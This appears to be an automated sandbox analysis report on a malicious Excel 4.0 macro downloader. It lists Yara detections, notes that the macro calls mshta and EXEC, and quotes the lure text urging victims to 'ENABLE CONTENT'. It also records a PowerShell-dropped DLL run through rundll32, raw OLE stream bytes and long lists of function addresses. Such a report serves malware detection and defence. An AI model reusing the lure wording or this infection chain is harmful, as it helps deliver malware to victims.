Source: Yara match	File source: 10.2.rundll32.exe.2890000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.2700000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2170000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.2890000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.10000000.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.672129305.0000000000460000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.565576249.0000000002841000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.614471421.0000000003061000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.510608388.0000000002ED1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.565412374.00000000026D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.564937807.0000000000200000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.672206410.00000000004C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.672542934.00000000023C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.675105738.00000000031C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.509691983.0000000000380000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.672233162.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.671351696.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.614263255.0000000002891000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.671971939.00000000003E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.514065714.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.613086830.0000000000190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.672276729.0000000000611000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.614545776.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.510373196.0000000002890000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.510260153.0000000002740000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.613891474.0000000002170000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.613342038.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.565506727.00000000027A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.567895594.0000000000300000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.675067684.0000000003190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.614325624.0000000002950000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.614438771.0000000003030000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.510667014.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.565439888.0000000002701000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.510425143.00000000028C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.565551248.0000000002810000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.565698294.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.510010458.0000000002130000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.509922920.0000000002080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.514698978.0000000000471000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.510517753.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.510176839.00000000026B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.568150198.0000000000331000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.672589404.00000000023F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.613442141.00000000006C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.675028637.0000000003161000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.613971338.0000000002491000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.565128790.0000000000661000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.565466027.0000000002730000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.614142809.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.674472849.0000000002891000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.672492274.0000000002340000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.614372731.0000000002DC1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.509833538.0000000000421000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.565096650.0000000000630000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.613198246.0000000000431000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.675215559.0000000010001000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.450462581.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.510060149.0000000002161000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.617473555.0000000000441000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.617627799.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.510140052.0000000002280000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.671797398.0000000000330000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.510293000.00000000027C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.564986915.0000000000261000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.565627998.00000000028A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.509954832.0000000002101000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.616810767.0000000000190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.674563401.00000000028F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.614197032.0000000002831000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.568578862.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.565801844.0000000003151000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.671423407.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.565866582.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.614228489.0000000002860000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.514808197.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.565599896.0000000002870000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\ProgramData\QWER.dll, type: DROPPED

System Summary

Found malicious Excel 4.0 Macro

Source: 80_513972285.xls	Macro extractor: Sheet: Macro1 contains: mshta
Source: 80_513972285.xls	Macro extractor: Sheet: Macro1 contains: mshta

Malicious sample detected (through community Yara rule)

Source: 80_513972285.xls, type: SAMPLE	Matched rule: Detects OLE Excel 4 Macros documents acting as downloaders Author: ditekSHen
Source: C:\Users\user\Desktop\80_513972285.xls, type: DROPPED	Matched rule: Detects OLE Excel 4 Macros documents acting as downloaders Author: ditekSHen

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22
Source: Screenshot number: 4	Screenshot OCR: DOCUMENT IS PROTECTED. 10 11 12 13 Previewing is not available for protected documents. 14 15
Source: Screenshot number: 4	Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
Source: Screenshot number: 4	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 23 24 25 26 27 2
Source: Document image extraction number: 0	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Screenshot number: 8	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 G
Source: Screenshot number: 8	Screenshot OCR: DOCUMENT IS PROTECTED. 10 11 :: Previewing is not available for protected documents. 14 15 Yo
Source: Screenshot number: 8	Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
Source: Screenshot number: 8	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 G) I I 23 24 25 26

Document contains OLE streams with names of living off the land binaries

Source: 80_513972285.xls	Stream path 'Workbook' : ........ZO..........................\.p....xXx B.....a.........=.............................................=........p.08.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1..h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......9...........C.a.l.i.b.r.i...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q..6.._.-.. .#.,.#.#.0.\. .".. "._.-.;.\.-.. .#.,.#.#.0.\. .".. "._.-.;._.-.. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._- #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._- #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* $#,##0.00$;_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .....
Source: 80_513972285.xls.0.dr	Stream path 'Workbook' : ........ZO..........................\.p....user B.....a.........=.............................................=........p.08.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1..h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......9...........C.a.l.i.b.r.i...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q..6.._.-.. .#.,.#.#.0.\. .".. "._.-.;.\.-.. .#.,.#.#.0.\. .".. "._.-.;._.-.. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._- #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._- #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* $#,##0.00$;_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .....

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\ProgramData\QWER.dll

Jump to dropped file

Found Excel 4.0 Macro with suspicious formulas

Source: 80_513972285.xls	Initial sample: EXEC
Source: 80_513972285.xls	Initial sample: EXEC

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_10036007
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_10041050
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_1003130F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_100323E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_10030460
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_10041592
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_1003E59F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_1003960C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_100317E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_10040B0E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_10031BB6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_10041C56
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_10036CB5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_1001CD16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_10042D21
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_10031FC2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00349700
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00355CF9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00355040
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035109E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00346083
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_003470ED
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034911A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034F154
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035A156
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_003541A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00359186
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035026B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034E243
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035129C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034C309
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035B391
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035C38F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035D3C8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035542E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035A429
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034B41A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0036146E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_003504B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035E498
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_003564F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_003444FA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_003604DE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_003574DD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00353512
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034F58F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_003545CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035363D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035561F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00363672
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00348650
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034472E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034777B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00352753
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00351831
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00342830
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034B821
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00360867
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00356864
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034E86A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034C850
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_003488F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035D8D7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_003468DE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034F93D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00341950
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00350946
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034194C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035C9A9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_003599AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00361993
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00346A1F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00349A7D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034CA43
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034AB66
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00361B54
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00354B56
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034BB4B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00347B82
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00352BF6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035EBFF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00357BCA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00346C29
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034EC9B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035CC89
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035ACD3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00350D33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034BD0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00358D71
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00360D5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00353D41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00348D95
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034FD8C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035EE94
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034AE9A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035BE8C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00346ED6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0035FF31
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00343FB8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00342FA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00341F9B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0034CFCE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_004374DD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_004270ED
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00435CF9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0043BE8C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0043EE94
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0042EC9B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0043E498
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00441B54
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00429700
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00433512
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0042F93D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0043B391
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00428D95
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0042CA43
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0042E243
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00435040
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0042C850
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00428650
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00440867
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00436864
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0042E86A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0043026B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0044146E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00443672
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00429A7D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0042B41A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0043561F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00426A1F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0042B821
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0043A429
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00426C29
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0043542E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00431831
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00422830
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0043363D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0043ACD3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00426ED6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0043D8D7
